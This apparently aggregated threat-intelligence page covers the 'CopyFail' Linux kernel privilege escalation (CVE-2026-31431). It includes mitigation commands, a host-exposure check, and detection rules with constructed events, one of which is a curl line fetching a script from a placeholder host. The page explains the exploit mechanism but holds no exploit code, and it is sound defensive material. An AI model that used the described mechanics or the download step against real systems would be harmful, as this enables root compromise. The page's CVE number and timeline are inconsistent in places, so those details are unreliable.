Copy Fail Exploit Kit Exploits Linux Flaw
2026-05-05 15:01 | Severity: HIGH
Executive Summary (AI-generated)
The newly-disclosed Linux kernel bug dubbed "CopyFail" is already being exploited by attackers, just days after researchers dropped a reliable root-level exploit. This fresh flaw in the Linux kernel gives low-level users a way to take full control of systems by modifying data they should only be able to read, effectively turning limited access into full root privileges on unpatched machines.
Technical Mitigations (AI-generated)
• Until patched kernels are deployed, block loading of the algif_aead kernel module and unload it where it is present (the modprobe and rmmod commands under Interim Guidance below).
• Patch mainstream Linux kernel distributions built since 2017 with priority.
• Provide users with clear instructions on how to patch systems within two weeks.
Technical Observables
Intelligence Metadata
Actors / Malware / CVEs / Campaigns: CVE-2026-31431 (also cited on this page as CVE-2026-314331)
Target regions: NORTH_AMERICA, MIDDLE_EAST, EUROPE
Sectors: government
Incident Timeline
March 23
Theori reported the flaw to the Linux kernel security team. The issue was disclosed by cybersecurity consultancy Theori, which said the flaw was discovered by its AI-powered penetration testing platform, Xint, and reported to the Linux kernel security team on March 23.
2026/04/28
The Register reported that attackers are exploiting a recently disclosed 'CopyFail' Linux flaw to gain unauthorized access. As The Register reported last week, the flaw stems from how the kernel handles certain cryptographic operations, opening a path to tamper with cached data in ways that were never meant to be user-controlled.
April 29, 2026
Researchers publicly disclosed a highly reliable local privilege escalation (LPE) vulnerability tracked as CVE-2026-31431 on April 29, 2026.
2026/05/05
Attackers are cashing in on the fresh 'CopyFail' Linux flaw.
Vulnerabilities Discussed
CVE-2026-31431
Details of CVE-2026-31431
The vulnerability tracked as CVE-2026-31431, known as Copy Fail, is a deterministic logic flaw located in the Linux kernel's cryptographic subsystem, specifically within the algif_aead module of the AF_ALG interface.
Cyber-crime
Attackers are cashing in on fresh 'CopyFail' Linux flaw
Researchers dropped a reliable root exploit and it didn't sit idle for long
CISA is warning that a newly-disclosed Linux kernel bug dubbed "CopyFail" is already being exploited, just days after researchers dropped a working root-level exploit.
Tracked as CVE-2026-31431, the bug sits in the Linux kernel and gives low-level users a way to take full control of a system by modifying data they should only be able to read, effectively turning limited access into full root privileges on unpatched machines.
Major Linux distributions pushed out patches ahead of public disclosure, which Theori published alongside a proof-of-concept exploit.
The Python-based code works against Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1, and SUSE 16, but the researchers warned that every mainstream Linux kernel built since 2017 is in scope of potential exploitation.
"The same exploit binary works unmodified on every Linux distribution," Theori says.
Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years
Discovered in about an hour through an AI-assisted process, this logic flaw allows an unprivileged local attacker to consistently escalate their access to root across virtually all major Linux distributions released since 2017. A single 732-byte Python script can successfully exploit it without any modification across different Linux distributions.
The vulnerability originates in the Linux kernel's cryptographic subsystem, specifically within the algif_aead module of the AF_ALG interface (a user space crypto API). Impacted versions include Linux kernels between 4.14 and 6.19.12. This vulnerability affects millions of systems running mainstream distributions such as Ubuntu, Amazon Linux, Red Hat Enterprise Linux, Debian, SUSE and AlmaLinux.
Palo Alto Networks customers receive protections from and mitigations for CVE-2026-31431 through the following products:
The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
The Root Cause
The flaw originates from a buggy in-place optimization introduced to the Linux kernel in 2017 (commit 72548b093ee3) for AEAD encryption.
Exploit Characteristics
What makes Copy Fail exceptionally severe compared to previous Linux LPE vulnerabilities like Dirty Cow or Dirty Pipe is its reliability and simplicity:
• No race conditions or offsets: It is a straight-line logic flaw that does not rely on winning a race condition window or guessing kernel-specific memory offsets.
• 100% reliability: The exploit is deterministic and fires successfully on the first attempt.
This same script works unmodified across virtually all major Linux distributions shipped since 2017.
Interim Guidance for CVE-2026-31431
The vulnerability has been resolved in upstream Linux kernel stable branches by reverting the flawed 2017 optimization (commit a664bf3d603d).
Until a patched kernel is installed, the algif_aead module can be disabled by running the following commands as root, which block the module from loading and remove it from the running kernel:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
Cortex Cloud 2.1 can detect and prevent malicious operations using behavioral and AI-enabled analytics to detect when attackers target Linux endpoints, including containers and virtual machines.
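The interim guidance above names two conditions a defender wants to confirm on each host: the kernel version falls in the affected range the article gives (4.14 through 6.19.12), and the algif_aead module is both unloaded and blocked from loading on demand. The script below is an added host check written for this page; it is not code from the Linux Foundation advisory, from Theori, or from Palo Alto Networks. It takes the kernel release string, the contents of /proc/modules and the modprobe .conf texts as plain inputs so the logic can be exercised offline, and the __main__ section feeds it the live host's values. The function names and the "needs_attention" rule are this example's own.

```python
"""Added host check (not from the advisory, the Linux Foundation, or Theori).

Reports whether a host still exposes the algif_aead module and whether the
running kernel sits in the version range the article gives (4.14 through
6.19.12). Inputs are passed as text so the logic can be exercised offline;
the __main__ section feeds it the live host's values.
"""
import os
import re
from pathlib import Path

AFFECTED_MIN = (4, 14, 0)    # from the article: affected kernels 4.14 .. 6.19.12
AFFECTED_MAX = (6, 19, 12)

_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")
# Matches the advisory's mitigation line; /bin/true is accepted as an equivalent.
_INSTALL_RE = re.compile(r"^\s*install\s+algif_aead\s+/bin/(?:false|true)\b", re.M)


def parse_kernel_version(release):
    """'6.8.0-45-generic' -> (6, 8, 0); '4.14' -> (4, 14, 0)."""
    m = _VER_RE.match(release)
    if not m:
        raise ValueError("unrecognised kernel release string: %r" % release)
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def kernel_in_affected_range(release):
    """True if the version lies within [4.14, 6.19.12] inclusive.

    Caveat: distributions backport fixes to older point releases, so an
    in-range version is a prompt to check the vendor advisory, not proof
    of exposure; an out-of-range version is the only clean negative here.
    """
    return AFFECTED_MIN <= parse_kernel_version(release) <= AFFECTED_MAX


def algif_aead_loaded(modules_text):
    """True if algif_aead is listed in /proc/modules-format text."""
    return any(line.split(" ", 1)[0] == "algif_aead"
               for line in modules_text.splitlines())


def algif_aead_blocked_in(conf_texts):
    """True if any modprobe .conf text redirects 'install algif_aead' to /bin/false."""
    return any(_INSTALL_RE.search(text) for text in conf_texts)


def read_modprobe_confs(modprobe_dir="/etc/modprobe.d"):
    """Contents of every *.conf under the modprobe directory (empty if absent)."""
    texts = []
    for conf in sorted(Path(modprobe_dir).glob("*.conf")):
        try:
            texts.append(conf.read_text(errors="replace"))
        except OSError:
            continue
    return texts


def assess_host(release, modules_text, conf_texts):
    """Summarise the exposure indicators for one host."""
    in_range = kernel_in_affected_range(release)
    loaded = algif_aead_loaded(modules_text)
    blocked = algif_aead_blocked_in(conf_texts)
    return {
        "kernel": release,
        "kernel_in_affected_range": in_range,
        "algif_aead_loaded": loaded,
        "algif_aead_blocked": blocked,
        # Attention is needed when the kernel is in range and the module is
        # still loaded or can still be loaded on demand.
        "needs_attention": in_range and (loaded or not blocked),
    }


if __name__ == "__main__":
    try:
        modules = Path("/proc/modules").read_text()   # Linux only
    except OSError:
        modules = ""
    for key, value in assess_host(os.uname().release, modules,
                                  read_modprobe_confs()).items():
        print("%s: %s" % (key, value))
```

One caveat the check cannot see: if a distribution builds algif_aead into the kernel image instead of shipping it as a loadable module, it never appears in /proc/modules and neither the modprobe line nor rmmod applies; on such a kernel only the vendor kernel update removes the flaw, and a "not loaded" answer here should not be read as "not exposed".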
• High portability: The exploit can be executed using a standalone 732-byte Python script that relies solely on standard libraries (os, socket, zlib), meaning no compilation or external dependencies are required.
"Given the availability of a fully working exploit proof-of-concept (PoC) and the race to patch systems, Microsoft Defender is seeing preliminary testing activity that might result most likely in increased threat actor exploitation over the next few days," the company warned.
Title: CopyFail Proof of Concept Code Execution
// Description: Query looks for potential CopyFail proof of concept (POC) code execution via identifying potentially correlated curl and su process executions.
This is especially important, given that a highly reliable proof-of-concept (PoC) script is already publicly available and preliminary testing activity has been observed.
Unit 42 Managed Threat Hunting Queries
The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below.
// MITRE ATT&CK TTP ID: T1068
dataset = xdr_data
| fields _time, agent_hostname, agent_os_type, event_type, event_sub_type, actor_effective_username, actor_effective_user_sid, actor_process_image_path, actor_process_image_name, actor_process_command_line, actor_process_image_sha256, action_process_image_name, action_process_image_command_line, action_process_user_sid
| filter event_type = ENUM.
This vulnerability is commonly referred to as Copy Fail.
Rather than a single coding error, the flaw resulted from a combination of three independent updates:
• The addition of the authencesn algorithm in 2011
• The AF_ALG interface gaining AEAD support in 2015
• A fatal in-place optimization introduced in 2017
During cryptographic operations, an in-place optimization bug causes the algorithm to use the destination buffer improperly, writing four controlled bytes past the legitimate region directly into the system's file page cache.
Because the kernel and its page cache are shared across an entire node, this flaw allows attackers to:
• Easily break out of Kubernetes containers
• Overtake multi-tenant hosts
• Compromise continuous integration and continuous delivery (CI/CD) pipelines
We strongly urge organizations to patch their systems immediately by applying vendor-issued kernel updates.
The authencesn algorithm is used for IPsec extended sequence number (ESN) support and uses the destination buffer as a scratch pad to rearrange these sequence numbers.
The attacker controls the exact four-byte overwrite value by supplying the seqno_lo (the low half of the sequence number) inside bytes 4–7 of the Associated Authenticated Data (AAD) during the sendmsg() call.
Exploitation Via the Page Cache
The page cache is the temporary in-memory copy of a file that the kernel reads when it loads a binary for execution.
When the binary is executed, it grants the attacker superuser (UID 0) privileges, effectively breaking the kernel's trust boundaries.
• Stealth: Because this corruption occurs entirely in the system's RAM, the physical file on the disk remains completely unmodified. This bypasses traditional virtual file system (VFS) paths and file integrity monitoring tools.
CopyFail Detection
Title: CopyFail Detection via Non-root Launching su via Uncommon Parent Process
// Description: Query looks for non-root users launching the switch user (su) process via a parent process other than the normally expected processes such as shells, sudo, or su itself.
PROCESS_START and agent_os_type = ENUM.
May identify false positives, yet works well for identification of CopyFail POC provided by Xint.
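The two hunting queries described above rest on two process-telemetry ideas: a non-root user launching su from a parent that is not a shell, sudo or su, and a curl execution followed shortly by su for the same user. The script below is an added example written for this page, not one of Unit 42's XQL queries and not Palo Alto Networks code; it rebuilds both rules in plain Python over constructed PROCESS_START events so the logic can be read and run offline. The column names mirror the XQL query; the sample events, the expected-parent set, and the ten-minute correlation window are this example's assumptions, to be tuned against real telemetry.

```python
"""Added detection example; it is not one of Unit 42's XQL queries and not
Palo Alto code. It rebuilds the two hunting ideas described above in plain
Python over constructed PROCESS_START events so the logic can be read and
run offline:
  rule 1 - a non-root user starts su from a parent outside the usual
           shells, sudo or su;
  rule 2 - the same non-root user on the same host runs curl and then su
           within a short window.
Column names mirror the XQL query; the events, the expected-parent set and
the window length are assumptions to tune against real telemetry.
"""
from datetime import datetime, timedelta

# Assumption: parents from which a user ordinarily reaches su (the query
# description's "shells, sudo, or su itself"); anything else is uncommon.
EXPECTED_SU_PARENTS = {"bash", "sh", "dash", "zsh", "fish", "sudo", "su"}
CORRELATION_WINDOW_S = 600   # assumption: ten minutes between curl and su

T0 = datetime(2026, 5, 5, 9, 0, 0)   # constructed base time


def _ev(offset_s, host, user, parent, child, cmdline):
    """One constructed PROCESS_START event using the XQL column names."""
    return {
        "_time": T0 + timedelta(seconds=offset_s),
        "agent_hostname": host,
        "event_type": "PROCESS_START",
        "actor_effective_username": user,     # user owning the parent process
        "actor_process_image_name": parent,   # parent image
        "action_process_image_name": child,   # child image being started
        "action_process_image_command_line": cmdline,
    }


# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    _ev(0,    "build-01", "dev",  "bash",    "curl", "curl -o /tmp/t.py http://example.invalid/t.py"),
    _ev(45,   "build-01", "dev",  "python3", "su",   "su"),                   # rule 1 and rule 2
    _ev(3600, "build-01", "dev",  "bash",    "su",   "su -"),                 # ordinary, an hour later
    _ev(10,   "db-02",    "root", "cron",    "su",   "su backup -c /opt/bk"), # root actor: out of scope
    _ev(20,   "db-02",    "ops",  "sudo",    "su",   "su -"),                 # expected parent
    _ev(30,   "db-02",    "ops",  "bash",    "curl", "curl https://example.invalid/health"),  # no su follows
]


def _in_scope(e):
    """Both rules look only at process starts whose actor is not root."""
    return e["event_type"] == "PROCESS_START" and e["actor_effective_username"] != "root"


def uncommon_parent_su(events):
    """Rule 1: su started by a non-root user from an unexpected parent."""
    hits = []
    for e in events:
        if not _in_scope(e) or e["action_process_image_name"] != "su":
            continue
        if e["actor_process_image_name"] in EXPECTED_SU_PARENTS:
            continue
        hits.append({"rule": "su_uncommon_parent", "time": e["_time"],
                     "host": e["agent_hostname"], "user": e["actor_effective_username"],
                     "parent": e["actor_process_image_name"]})
    return hits


def correlated_curl_su(events, window_seconds=CORRELATION_WINDOW_S):
    """Rule 2: curl followed by su for the same (host, user) inside the window."""
    last_curl = {}   # (host, user) -> time of the most recent curl
    hits = []
    for e in sorted(events, key=lambda x: x["_time"]):
        if not _in_scope(e):
            continue
        key = (e["agent_hostname"], e["actor_effective_username"])
        child = e["action_process_image_name"]
        if child == "curl":
            last_curl[key] = e["_time"]
        elif child == "su" and key in last_curl:
            gap = (e["_time"] - last_curl[key]).total_seconds()
            if gap <= window_seconds:
                hits.append({"rule": "curl_then_su", "time": e["_time"],
                             "host": key[0], "user": key[1],
                             "seconds_since_curl": int(gap)})
    return hits


def run_detections(events):
    """Run both rules; returns {rule_name: [hits]}."""
    return {"su_uncommon_parent": uncommon_parent_su(events),
            "curl_then_su": correlated_curl_su(events)}


if __name__ == "__main__":
    for rule, hits in run_detections(SAMPLE_EVENTS).items():
        print("%s: %d hit(s)" % (rule, len(hits)))
        for h in hits:
            print("   ", h)
```

Against the sample events each rule fires once, on the su started from python3 forty-five seconds after curl on build-01; the root-owned cron su, the sudo-launched su, and the su an hour after the last curl all fall outside the rules, which is the false-positive trade-off the page itself notes.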
Cortex XDR and XSIAM
Cortex XDR and XSIAM help protect against the threats described in this article, using the multi-layer protection approach, including Advanced WildFire, Endpoint Protection Modules (EPM), Behavioral Threat Protection and the Local Analysis module. Additionally, the platform can detect when cloud platform IAM policies associated with those targeted endpoints are being misused and alert teams when assets are vulnerable to these threats.
May 15
Threat actors are using the recently disclosed 'CopyFail' Linux vulnerability to target Federal Civilian Executive Branch agencies.
The CISA, the US government's cybersecurity agency, has added the bug to its Known Exploited Vulnerabilities catalog and ordered Federal Civilian Executive Branch agencies to patch within two weeks, setting a May 15 deadline.
Target region: United States. Industry: Government. Tactic: T1588.006 - Vulnerabilities.
Intelligence Sources
The Register - Cybercrime, 2026-05-05: Attackers are cashing in on fresh 'CopyFail' Linux flaw
Palo Alto, 2026-05-05
Incident Version History
Last Updated: 2026-06-29T10:30